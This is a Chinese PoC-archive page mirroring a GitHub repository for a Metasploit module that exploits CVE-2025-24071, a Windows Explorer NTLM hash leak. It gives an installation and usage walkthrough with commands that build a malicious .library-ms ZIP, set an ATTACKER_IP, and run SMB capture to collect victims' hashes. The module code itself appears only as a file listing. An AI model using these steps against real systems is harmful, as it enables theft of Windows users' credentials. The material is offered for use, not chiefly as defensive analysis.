漏洞平台

POC详情： 8c54efc3c261a903d6e4d55b17ca07110d0aa34f

来源

https://github.com/FOLKS-iwd/CVE-2025-24071-msfvenom

关联漏洞

标题： Microsoft Windows File Explorer 信息泄露漏洞 (CVE-2025-24071)
描述：Microsoft Windows File Explorer是美国微软（Microsoft）公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在信息泄露漏洞。攻击者利用该漏洞可以获取敏感信息。以下产品和版本受到影响：Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server

描述

metasploit module for the CVE-2025-24071

介绍

## CVE-2025-24071: NTLM Hash Leak via .library-ms File (Metasploit Module)

This repository contains a **Metasploit module** to exploit CVE-2025-24071, a vulnerability in Windows Explorer that leaks NTLM hashes when a malicious `.library-ms` file is extracted from a ZIP archive.

Developed by: **FOLKS-IWD**

---

## **Overview**
The vulnerability occurs when a user extracts a ZIP archive containing a specially crafted `.library-ms` file. Windows Explorer automatically initiates an SMB authentication request to a remote server specified in the file, leaking the user's NTLM hash without any user interaction.

This Metasploit module:
1. Generates a malicious `.library-ms` file.
2. Packs it into a ZIP archive.
3. Integrates with Metasploit's SMB capture functionality to collect NTLM hashes.
![image](https://github.com/user-attachments/assets/da2a71a3-7fc9-4687-bdcf-777de4c67d9a)


---

## **Installation**
1. Clone the repository:
   ```bash
   git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
   cd CVE-2025-24071-msfvenom
   ```
2. Copy the module to your Metasploit modules directory:
   ```bash
   cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
   ```
## **Usage**
1. Load the module:
   ```bash
   use auxiliary/server/ntlm_hash_leak
   ```
2. Set the required options:
   ```bash
   set ATTACKER_IP 192.168.1.162  # Replace with your IP address
   set FILENAME exploit.zip       # Name of the malicious ZIP file
   set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
   set SHARE_NAME shared          # SMB share name
   ```
3. Run the module :
 ```bash
   run
   ```
4. The module will generate a malicious ZIP file (exploit.zip). Host this file for the victim to download and extract.
5. Use Metasploit's SMB capture module to collect NTLM hashes:
   ```bash
   use auxiliary/server/capture/smb
   set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
   run
   ```

文件快照


 [4.0K]  /data/pocs/8c54efc3c261a903d6e4d55b17ca07110d0aa34f
├── [2.9K]  ntlm_hash_leak.rb
└── [1.9K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。